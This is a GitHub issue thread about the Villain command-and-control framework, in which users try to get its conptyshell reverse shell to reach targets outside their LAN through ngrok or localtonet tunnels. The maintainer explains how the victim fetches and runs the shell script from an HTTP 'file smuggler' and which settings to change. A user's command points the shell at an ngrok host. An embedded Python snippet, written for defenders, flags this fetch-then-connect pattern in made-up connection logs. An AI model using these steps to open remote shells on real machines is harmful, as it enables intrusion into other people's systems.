ConptyShell Issue #91

Open
PH03N1X1000 opened this issue Apr 17, 2023 · 5 comments
Comments

@PH03N1X1000

ConPtyShell only connects to sessions which are on the localhost, and it does not respond to payloads hosted on another network if the session is created through a tunnel.
It just shows listening on the port defined.
Can there be any way to make ConptyShell work with sessions made outside of the LAN (or should I use the port I specified for the tunnel)?
As I cannot perform proper port forwarding, since my ISP does not allow it, I have to use a tunnel for real use-case scenarios.
Thanks

@Cr7pt0nic

For your tunneling I recommend using localtonet or ngrok. For conptyshell I also had that same issue: conptyshell works perfectly when utilized with my local IPv4, but it had issues getting a connection back through my tunneling IP address, as it stayed as "listening" instead of establishing the connection through the tunnel. Would love to add a feature for conptyshell to instead connect through the tunneling host and port as well.

@t3l3machus
Owner

@Cr7pt0nic @PH03N1X1000 when you run conptyshell, a script is executed on the target session (in the background) which instructs the victim to request and execute Invoke-ConPtyShell from Villain's HTTP file smuggler, which by default runs on port 8888 (hosted for a single request). So in the case of conptyshell, as well as upload, which works in a similar manner, the HTTP file smuggler service's port should also be publicly accessible when you are trying this against hosts outside your LAN.
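
The two-stage flow described in the reply above (a scripting host first fetches the stager from the HTTP smuggler port, then opens the shell's own connection, in the thread's case to the same tunnel hostname) gives a defender a detectable pattern. The following is an added example, not Villain's own code: it runs over constructed, simplified connection records and flags a PowerShell process that reaches the same tunnel-service hostname on two different ports within a short window. The record format, the suffix list and the 60-second window are assumptions made for the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Illustrative tunnel-service suffixes; ngrok is the one named in the thread.
TUNNEL_SUFFIXES = (".ngrok.io",)
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe"}  # hosts a fetch-and-execute stager runs in

# Constructed, simplified connection records (not real telemetry):
# timestamp|process image|destination host|destination port
SAMPLE_LOG = """\
2023-04-17T10:00:01|powershell.exe|4.tcp.ngrok.io|8888
2023-04-17T10:00:03|powershell.exe|4.tcp.ngrok.io|19201
2023-04-17T10:05:00|chrome.exe|example.com|443
2023-04-17T10:07:00|powershell.exe|updates.internal.example|443
2023-04-17T11:00:00|powershell.exe|4.tcp.ngrok.io|4200
"""

def parse(log_text):
    """Turn the pipe-separated records into (time, image, host, port) tuples."""
    events = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, image, host, port = line.split("|")
        events.append((datetime.fromisoformat(ts), image.lower(), host.lower(), int(port)))
    return events

def is_tunnel_host(host):
    return host.lower().endswith(TUNNEL_SUFFIXES)

def find_two_stage(log_text, window_seconds=60):
    """Return (image, host, (port_a, port_b)) for every scripting host that
    reached the same tunnel hostname on two different ports within the window:
    the smuggler fetch followed by the shell's own connection."""
    window = timedelta(seconds=window_seconds)
    by_key = defaultdict(list)
    for ts, image, host, port in parse(log_text):
        if image in SCRIPT_HOSTS and is_tunnel_host(host):
            by_key[(image, host)].append((ts, port))
    findings = []
    for (image, host), conns in by_key.items():
        conns.sort()  # chronological, so the inner loop can stop at the window edge
        for i, (t1, p1) in enumerate(conns):
            for t2, p2 in conns[i + 1:]:
                if t2 - t1 > window:
                    break
                if p1 != p2:
                    findings.append((image, host, (p1, p2)))
    return findings
```

The lone 11:00 connection to port 4200 is deliberately not paired: a single scripting-host connection to a tunnel domain is worth a lower-severity alert on its own, but the two-port pattern is what matches the fetch-then-connect behaviour described here.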

@Cr7pt0nic

Actually, that's not the case whatsoever. When I ran conptyshell it asks for an IP or INTERFACE, including the PORT and session ID. I tried using ngrok to communicate with the external host outside my LAN, for example using

conptyshell 4.tcp.ngrok.io 19201 cad7d6-68f1d0-f83a32

The response I get from conptyshell is "Failed to parse LHOST value."

I tried other methods as well, including my local IP address and port 8888, and it states that it's already in use.

Tried doing other means, like the same local IP address and port 4200. It stays as "Listening on [any] 4200".
Okay, well that doesn't work either. Let's try another method: maybe I can try using ngrok and then the local port?

conptyshell 4.tcp.ngrok.io 8888 cad7d6-68f1d0-f83a32

Nope, same response as before: "Failed to parse LHOST value". I can input an interface because the interface itself just leads to the same local IP address as before. I tried using different ports other than port 8888, and I also tried using ngrok to see if there was any possible solution to the problem.

So I tried other solutions: maybe instead of using ngrok I could try using localtonet, another tunneling service. Well, no, because that didn't work either: it showed the port as listening and still no response actually going to that port. Tried port 8888, still the same response as last time, "Port already in use". Well, alright, that's useless, so I have no other options other than to ask for help, because I can't seem to get conptyshell to actually work. From my experience I have seen conptyshell work only on local networks (LAN) and not actually working on external networks (WAN). I was testing this on a virtual machine with the network adapter set to NAT (Network Address Translation), which makes it so that it's completely separate from my local network. Doing this test I found that it didn't work and only worked for devices within the local network.

@t3l3machus
Owner

@Cr7pt0nic

  1. To parse a domain name as lhost with TCP based shells, edit Villain/Core/settings.py and set validate_lhost_as_ip to False.

  2. Port 8888 is already in use because when you start Villain the http file smuggler service is by default bound to that port. Use another or start Villain with -f to set a different port for that service.

  3. After doing all that, which will solve your main issues, consider what I wrote in my previous reply.

@Cr7pt0nic

Alright, thank you for the support; that should also help solve other people's issues as well. I didn't realize I had to change settings.py to actually do it, so thank you for that information.
